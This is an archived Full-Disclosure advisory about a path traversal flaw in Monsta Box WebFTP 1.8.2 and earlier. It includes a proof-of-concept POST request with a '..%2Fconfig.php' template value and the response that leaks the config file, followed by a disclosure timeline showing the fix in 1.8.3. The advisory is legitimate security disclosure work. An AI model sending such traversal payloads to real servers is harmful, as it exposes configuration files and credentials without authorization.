lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <5705FDB6.2000707@search-lab.hu>
Date: Thu, 7 Apr 2016 08:27:02 +0200
From: Imre RAD <imre.rad@...rch-lab.hu>
To: fulldisclosure@...lists.org
Subject: [FD] Monsta Box WebFTP 1.8.2 and below arbitrary file read and path
 traversal vulnerabilities

Application
-----------
"MONSTA Box is a lightweight open-source file manager you can install on
your website or server * to easily manage your files through any browser."
(Description from the official website http://www.monstahq.com/)


Vulnerability
-------------
The Monsta Box WebFTP  application supports file templates when creating
new files. The template parameter is part of the HTTP request so it is a
user input and it was not sanitized correctly. By sending a HTTP request
with modified template parameter it was possible to traverse the
template directory and read arbitrary files (in context of the Monsta
Box WebFTP application).


PoC
---
A proof of concept request/response to read the config.php file of the
Monsta Box installation (note the template parameter of the HTTP request):

POST /? HTTP/1.1
Host: somehost
Referer: http://somereferer/
Content-Length: 352
Cookie: PHPSESSID=somecookie


&ftpAction=newFile&=Refresh&=Download&=Cut&=Copy&=Paste&=Rename&=Delete&=Logout&newFile=xxx&template=..%2Fconfig.php&=OK&=Cancel&=~&=&folderAction[]=&folderAction[]=&folderAction[]=&folderAction[]=&folderAction[]=&folderAction[]=&folderAction[]=&=New%20Folder&=New%20File&=Fetch%20File&=Upload%20Files&=Repeat%20Upload&windowWidth=1280&windowHeight=913

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 27 Mar 2016 19:34:21 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Frame-Options: SAMEORIGIN
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0,
pre-check=0
Pragma: no-cache

1cac
<div id="blackOutDiv"><div id="popupFrame" style="left: 110px; top:
60px; width: 1030px;"><div id="popupHeaderAction">Editing:
/xxx</div><div id="popupBodyAction" style="height: 693px;"><input
type="hidden" name="file" value="~/xxx"><textarea name="editContent"
id="editContent" style="height: 608px;">&lt;?php

# Open README file for descriptions and help.

$ftpHost = &quot;somehost&quot;;
$ftpPort = &quot;21&quot;;

...


Affected versions
-----------------
The above vulnerability was fixed in version 1.8.3. Older versions of
Monsta Box with template support are vulnerable.


Timeline
--------
2016-03-29: Vendor contacted for appropriate contact person to report to
2016-03-30: Vulnerability was reported
2016-03-31: Fixed version was published
2016-04-07: Public disclosure


Discovered by
-------------
Imre RAD
www.search-lab.hu
www.scademy.com


_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ